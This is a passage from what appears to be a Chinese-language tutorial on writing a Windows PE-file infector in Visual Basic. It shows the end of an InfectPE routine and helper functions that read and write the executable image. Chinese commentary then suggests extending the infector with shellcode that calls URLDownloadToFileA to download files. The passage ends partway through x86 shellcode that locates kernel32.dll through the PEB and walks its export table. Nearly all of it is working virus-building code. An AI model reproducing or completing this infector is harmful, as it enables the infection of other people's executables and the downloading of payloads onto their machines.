Exit Function

ERR:

   InfectPE = 0

End Function

Private Function ReadWord(ByVal Offset As Long) As Long
    CopyMemory ReadWord, PE(Offset), 2
End Function

Private Function ReadDword(ByVal Offset As Long) As Long
    CopyMemory ReadDword, PE(Offset), 4
End Function

Private Sub WriteDword(ByVal Offset As Long, ByVal Data As Long)
    CopyMemory PE(Offset), Data, 4
End Sub

Private Function Add0To8(ByVal InputStr As String) As String
    Add0To8 = String(8 - Len(InputStr), "0") & InputStr
End Function

Private Function Read8Str(ByVal Offset As Long) As String
    Dim i As Long, c As Byte, s As String
    For i = 0 To 7
         c = PE(Offset + i)
         If c < 32 Or c > 127 Then c = 32
         s = s & Chr(c)
    Next
    Read8Str = s
End Function

——————————————————————————————————————————————————-——

这个感染的功能很单调，可以写Shellcode，完成更多功能。比如调用fileexists函数查看文件是否存在，然后选择URLDOWNTOFILEA函数下载恢复等等···

Shellcode代码：

        push   ebp
        sub    esp, 0x40;
        mov    ebp, esp;
        push   ebp
        mov    eax, fs:0x30      
        mov    eax, [eax+0x0c]    ;Ldr
        mov    esi, [eax+0x1c]    ;Flink
        lodsd
        mov    edi, [eax+0x08]    ;edi = kernel32.dll
           
        mov    eax, [edi+3Ch]     ;eax = PE首部
        mov    edx, [edi+eax+78h]
        add    edx, edi           ;edx = 输出表地址
        mov    ecx, [edx+18h]     ;ecx = 输出函数个数
        mov    ebx, [edx+20h]